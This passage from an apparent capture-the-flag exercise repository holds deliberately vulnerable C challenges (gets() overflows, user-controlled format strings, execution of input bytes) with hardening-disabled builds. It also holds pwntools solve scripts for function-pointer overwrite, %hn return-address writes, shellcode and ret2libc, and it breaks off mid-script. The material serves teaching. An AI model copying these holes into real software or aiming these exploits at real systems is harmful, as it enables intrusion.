/* Prints the flag file; nothing in this program calls it directly. */
void secret(){
    system("cat flag");
}

/*
 * Reads a message name and content, prints them back, then calls `hook`
 * if it is non-zero.
 *
 * Training target, deliberately unsafe: gets() has no length limit, and
 * `hook` is the struct member after content[BUF_SIZE] (any padding before
 * it is compiler-dependent), so oversized input replaces a function
 * pointer that the program only ever sets to 0. Reading with
 * fgets(l.content, BUF_SIZE, stdin) would keep input inside the array.
 */
void send(){
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        void (*hook)();
    };
    struct locals l = {.name = {0}, .content = {0}, .hook = 0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);

    if(l.hook){
        l.hook();
    }
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Disables stdout buffering, sets real/effective/saved UID to the current
 * effective UID, then loops on menu() until it returns 0.
 * The return value of setresuid() is not checked.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch02!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch02/compile.sh:
--------------------------------------------------------------------------------
# $1 is the directory holding ch02.c; it is expanded unquoted.
# -static -no-pie yields a binary with a fixed load address, which is why the
# write-up below can read secret()'s address from the ELF file.
gcc $1/ch02.c -static -no-pie -o $1/ch02

--------------------------------------------------------------------------------
/writeups/i386/ch02/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's 'send' menu entry on tube `r`.

    Selects 'send', waits for each prompt, then submits `msg_name` and
    `msg_content` as one line each.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch02 write-up against the target selected by `execution`.

    The content line is 50 filler bytes followed by the address of
    secret(), read from the local ELF and packed as a 32-bit word. The
    ELF is opened by challenge name, so the script expects to run from
    the directory that holds the binary.

    NOTE(review): `'zenysec' + r.recvuntil('\n')` raises TypeError on
    Python 3 pwntools, where the tube returns bytes.
    """
    challenge_name = 'ch02'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    secret_func_addr = ELF(challenge_name).functions['secret'].address
    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32))
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch02')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch02/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch03/ch03:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch03/ch03
--------------------------------------------------------------------------------
/writeups/i386/ch03/ch03.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// NOTE(review): the header names after #include were lost when this page was
// extracted; the three lines below are reproduced as they appear.
#include
#include
#include

#define BUF_SIZE 50

/* Prints the flag file; nothing in this program calls it directly. */
void secret(){
    system("cat flag");
}

/*
 * Reads a message name and content into two stack arrays and prints them.
 *
 * Training target, deliberately unsafe: gets() has no length limit, so
 * input longer than BUF_SIZE is written past `content` into the rest of
 * the stack frame. This challenge's compile.sh also turns the stack
 * protector off. Reading with fgets(content, BUF_SIZE, stdin) and building
 * with the protector enabled are the corresponding fixes.
 */
void send(){
    char name[BUF_SIZE] = {0};
    char content[BUF_SIZE] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE, stdin);
    printf("Enter message content:");
    gets(content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for everything else, including unknown input.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Disables stdout buffering, sets real/effective/saved UID to the current
 * effective UID, then loops on menu() until it returns 0.
 * The return value of setresuid() is not checked.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch03!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch03/compile.sh:
--------------------------------------------------------------------------------
# $1 is the directory holding ch03.c; it is expanded unquoted.
# -fno-stack-protector removes the stack canary and -no-pie fixes the load
# address; both are deliberate weakenings for this exercise.
gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03

--------------------------------------------------------------------------------
/writeups/i386/ch03/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's 'send' menu entry on tube `r`.

    Selects 'send', waits for each prompt, then submits `msg_name` and
    `msg_content` as one line each.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch03 write-up against the target selected by `execution`.

    The content line is 128 filler bytes followed by the address of
    secret(), read from the local ELF and packed as a 32-bit word. The
    filler length is tied to one particular build's stack frame layout;
    a rebuild with another compiler or flags may need a different value.

    NOTE(review): `'zenysec' + r.recvuntil('\n')` raises TypeError on
    Python 3 pwntools, where the tube returns bytes.
    """
    challenge_name = 'ch03'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    functions = ELF(challenge_name).functions
    secret_func_addr = functions['secret'].address

    r.recvuntil('exit - close program')
    send(r, msg_name='angel', msg_content=cyclic(128) + pack(secret_func_addr, word_size=32))
    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch03')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch03/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch04/ch04:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch04/ch04
--------------------------------------------------------------------------------
/writeups/i386/ch04/ch04.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: the unsafe reads in send() are the point of the challenge.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// Message text and the "permission" string are both writable globals.
// NOTE(review): they are declared back to back, so they are presumably
// placed next to each other in the data section - confirm with the linker map.
char content[BUF_SIZE*2] = "dummy";
char perm[BUF_SIZE*2] = "user";

// Prints the flag file through the shell.
void secret(){
    system("cat flag");
}

// Reads a message name and content, echoes them, and calls secret() when
// perm equals "root".
void send(){
    char name[BUF_SIZE] = {0};
    printf("Creating message\n");
    printf("Enter message name:");
    // Bound is BUF_SIZE*2 but name holds BUF_SIZE bytes: fgets may write up
    // to 99 bytes plus the terminator into a 50-byte stack buffer.
    // A correct bound is sizeof(name).
    fgets(name, BUF_SIZE*2, stdin);
    printf("Enter message content:");
    // gets() has no length limit, so input longer than content[] runs into
    // whatever follows it in memory. The bounded form is
    // fgets(content, sizeof(content), stdin).
    gets(content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
    // The authorization decision rests on a writable string that nothing in
    // this file ever sets to "root"; it can only change through memory
    // corruption such as the gets() call above.
    if(strcmp(perm, "root") == 0){
        secret();
    }
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    // Correctly bounded read; commands are compared with the trailing newline.
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch04!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch04/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build: code and globals load at fixed addresses.
# $1 is the challenge directory; it is used unquoted.
gcc $1/ch04.c -static -no-pie -o $1/ch04

--------------------------------------------------------------------------------
/writeups/i386/ch04/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch04 solve script and log the flag line.

    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch04'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    r.recvuntil('exit - close program')
    # 128 filler bytes, then the string ch04.c compares perm against. This
    # matches the unbounded gets(content) in ch04.c; the 128-byte distance is
    # presumably how far perm sits from content in this build - TODO confirm.
    send(r, msg_name='angel', msg_content=cyclic(128) + 'root')
    r.recvuntil('zenysec')
    # NOTE(review): str concatenation with pwntools values assumes Python 2;
    # on Python 3 cyclic() and recvuntil() return bytes.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch04')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch04/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch05/ch05:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch05/ch05
--------------------------------------------------------------------------------
/writeups/i386/ch05/ch05.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: the format-string misuse in send() is the point of the
// challenge.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// Prints the flag file through the shell. Nothing in this file calls it.
void secret(){
    system("cat flag");
}

// Reads a message name and content and echoes both back.
void send(){
    char name[BUF_SIZE*2] = {0};
    char content[BUF_SIZE*2] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    // Both reads are bounded to the buffer size, so there is no overflow here.
    fgets(name, BUF_SIZE*2, stdin);
    printf("Enter message content:");
    fgets(content, BUF_SIZE*2, stdin);

    printf("name: \"%s\"\ncontent:\"", name);
    // User input is passed as the format string, so conversion specifiers in
    // it are interpreted by printf (stack reads with %x, memory writes with
    // %n). The safe form is printf("%s", content); -Wformat-security flags
    // this call at compile time.
    printf(content);
    printf("\"\n");
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch05!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
    // Unlike the sibling challenges, main leaves through exit() with status 1
    // instead of returning.
    exit(1);
}

--------------------------------------------------------------------------------
/writeups/i386/ch05/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build: code loads at fixed addresses.
# $1 is the challenge directory; it is used unquoted.
gcc $1/ch05.c -static -no-pie -o $1/ch05

--------------------------------------------------------------------------------
/writeups/i386/ch05/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch05 solve script and log the flag line.

    Two ``send`` rounds against the ``printf(content)`` call in ch05.c: the
    first reads a stack value, the second uses ``%hn`` writes.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch05'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    # Fixed address taken from the on-disk ELF; assumes a non-PIE build.
    secret_func_addr = ELF(challenge_name).functions['secret'].address

    leak_offset = 1
    r.recvuntil('exit - close program')
    # Round 1: a single positional %x makes the target print one stack word.
    send(r, msg_name='angel',
         msg_content='%{leak_offset}$x'.format(leak_offset=leak_offset))
    r.recvuntil('content:\"')
    # 0xd8 is a hard-coded distance from the leaked value; it is specific to
    # this build's stack layout.
    stack_return = int(r.recvuntil('\n').strip(), 16) + 0xd8
    log.info("stack return: {stack_return}".format(stack_return=hex(stack_return)))
    r.recvuntil('exit - close program')

    # Padding widths for the two half-word writes; the 0x8 and 9 corrections
    # and the argument positions 30/31 are tied to this exact format string
    # and build.
    r1 = (secret_func_addr & 0xffff) - 0x8
    r2 = ((secret_func_addr >> 16) - r1 - 9) & 0xffff
    content_offset01 = 30
    content_offset02 = 31

    # Option A
    # NOTE(review): formatting pack() output into a str assumes Python 2;
    # on Python 3 pack() returns bytes and the result would contain "b'...'".
    send(r, msg_name='angel',
         msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn%{padding02}x%{content_offset02}$hnn'.format(
             ret01=pack(stack_return, word_size=32),
             ret02=pack(stack_return + 2, word_size=32),
             content_offset01=content_offset01,
             content_offset02=content_offset02,
             padding01=r1,
             padding02=r2))

    # Option B
    # send(r, msg_name='angel',
    #      msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn'.format(
    #          ret01=pack(stack_return, word_size=32),
    #          ret02=pack(stack_return + 2, word_size=32),
    #          content_offset01=content_offset01,
    #          padding01=r1))

    r.recvuntil('zenysec')
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch05')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch05/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch06/ch06:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch06/ch06
--------------------------------------------------------------------------------
/writeups/i386/ch06/ch06.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: runner() executes caller-supplied bytes by design.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#include

#define BUF_SIZE 50
#define PAGE_SIZE 4096

// Reads one line of input, copies it into a fresh anonymous page, makes the
// page read+execute and calls it as a function.
void runner(){
    // Not zero-initialised: bytes past what fgets stores are stale stack data.
    char content[PAGE_SIZE];
    char *code;

    printf("Enter byte to run:");
    // fgets stops at the first newline, so the input cannot contain 0x0a.
    fgets(content, PAGE_SIZE, stdin);

    // The mapping is writable first and executable later (never both).
    // The result is not compared with MAP_FAILED.
    code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    // Copies the whole page, including the uninitialised tail of content[].
    memcpy(code, content, PAGE_SIZE);

    // Return value not checked.
    mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC);

    // Control transfers to input bytes with the privileges of this process;
    // nothing restricts what that code may do.
    void (*func)() = (void (*)())code;
    func();

    munmap(code, PAGE_SIZE);
}

// Reads a message name and content with correctly bounded fgets calls and
// echoes them through a fixed format string.
void send(){
    char name[BUF_SIZE] = {0};
    char content[BUF_SIZE] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE, stdin);
    printf("Enter message content:");
    fgets(content, BUF_SIZE, stdin);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("runner - run bytes\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "runner\n") == 0){
        runner();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch06!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch06/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build. $1 is the challenge directory; it is used unquoted.
gcc $1/ch06.c -static -no-pie -o $1/ch06

--------------------------------------------------------------------------------
/writeups/i386/ch06/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def runner(r, payload):
    """Select the target's ``runner`` command and send *payload* at its prompt."""
    r.sendline('runner')
    r.recvuntil('Enter byte to run:')
    r.sendline(payload)


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Not called by ``main`` in this script.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch06 solve script and log the flag line.

    Uses the ``runner`` command, which in ch06.c executes its input directly.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch06'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    # Option 1
    # Stock pwntools shell payload assembled for i386 Linux.
    shell_code = asm(shellcraft.i386.linux.sh())

    r.recvuntil('exit - close program')
    runner(r, payload=shell_code)

    r.sendline('cat flag')
    r.recvuntil('zenysec')
    # NOTE(review): str + recvuntil() assumes Python 2 pwntools.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch06')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch06/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch07/ch07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch07/ch07
--------------------------------------------------------------------------------
/writeups/i386/ch07/ch07.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: the unbounded gets() in send() is the point of the
// challenge.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// A shell path kept as a global string; nothing in this file reads it.
char str[BUF_SIZE] = "/bin/sh\x00";

// Lists the directory through the shell; its presence links system() into
// the static binary. Nothing in this file calls it.
void func(){
    system("ls");
}

// Reads a message name and content and echoes them.
void send(){
    char name[BUF_SIZE] = {0};
    char content[BUF_SIZE] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // gets() has no length limit: input longer than the 50-byte stack buffer
    // overwrites adjacent stack data. compile.sh also disables the stack
    // protector. The bounded form is fgets(content, sizeof(content), stdin).
    gets(content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch07!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch07/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build with stack canaries turned off (-fno-stack-protector).
# $1 is the challenge directory; it is used unquoted.
gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07

--------------------------------------------------------------------------------
/writeups/i386/ch07/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch07 solve script and log the flag line.

    Targets the unbounded ``gets(content)`` in ch07.c.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch07'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    e = ELF(challenge_name)
    functions = e.functions

    # Both addresses are read from the on-disk ELF; assumes a non-PIE build.
    func_system_addr = functions['system'].address
    command_string_addr = list(e.search('/bin/sh'))[-1]

    r.recvuntil('exit - close program')
    # 128 filler bytes, the address of system(), four placeholder bytes and
    # the address of the shell-path string.
    # NOTE(review): the last pack() has no word_size and relies on the
    # pwntools context default, unlike the other pack() calls - confirm.
    send(r, msg_name='angel',
         msg_content=cyclic(128) + pack(func_system_addr, word_size=32) + 'aaaa' + pack(command_string_addr))
    # `time` is not imported here; presumably it arrives via `from pwn import *`.
    time.sleep(1)
    r.sendline('cat flag')
    r.recvuntil('zenysec')
    # NOTE(review): str concatenation with pwntools values assumes Python 2.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch07')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch07/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch08/ch08:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch08/ch08
--------------------------------------------------------------------------------
/writeups/i386/ch08/ch08.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: send() combines a format-string misuse with an
// unbounded read.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// Reads a message name and content and echoes them.
void send(){
    char name[BUF_SIZE] = {0};
    char content[BUF_SIZE] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // gets() has no length limit: input longer than the 50-byte stack buffer
    // overwrites adjacent stack data. The bounded form is
    // fgets(content, sizeof(content), stdin).
    gets(content);

    printf("name: \"");
    // User input is passed as the format string, so conversion specifiers in
    // it are interpreted by printf. The safe form is printf("%s", name).
    printf(name);
    printf("\"\ncontent:\"%s\"\n", content);
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch08!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch08/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build with stack canaries off and an executable stack
# (-z execstack), i.e. with the usual stack hardening removed.
# $1 is the challenge directory; it is used unquoted.
gcc $1/ch08.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch08

--------------------------------------------------------------------------------
/writeups/i386/ch08/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch08 solve script and log the flag line.

    Two ``send`` rounds: the first uses ``printf(name)`` in ch08.c to read a
    stack value, the second uses the unbounded ``gets(content)``.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch08'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    # Stock pwntools shell payload assembled for i386 Linux.
    shell_code = asm(shellcraft.i386.linux.sh())
